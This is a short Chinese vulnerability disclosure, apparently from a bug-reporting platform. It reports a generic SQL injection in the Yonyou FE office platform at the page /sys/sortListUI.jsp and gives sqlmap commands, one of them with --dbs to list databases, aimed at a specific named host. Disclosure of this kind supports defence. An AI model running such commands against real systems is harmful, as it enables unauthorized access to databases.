用友FE办公平台通用SQL注入

简要描述： 用友办公平台通用SQL注入 详细说明： 漏洞url /sys/sortListUI.jsp?searchKeyvalue=1&lx=1 poc: sqlmap -u "http://oa.shunhengli.com:9090/sys/sortListUI.jsp?searchKeyvalue=1&lx=1" 漏洞证明： sqlmap -u "http://oa.shunhengli.com:9090/sys/sortListUI.jsp?searchKeyvalue=1&lx=1" --dbs...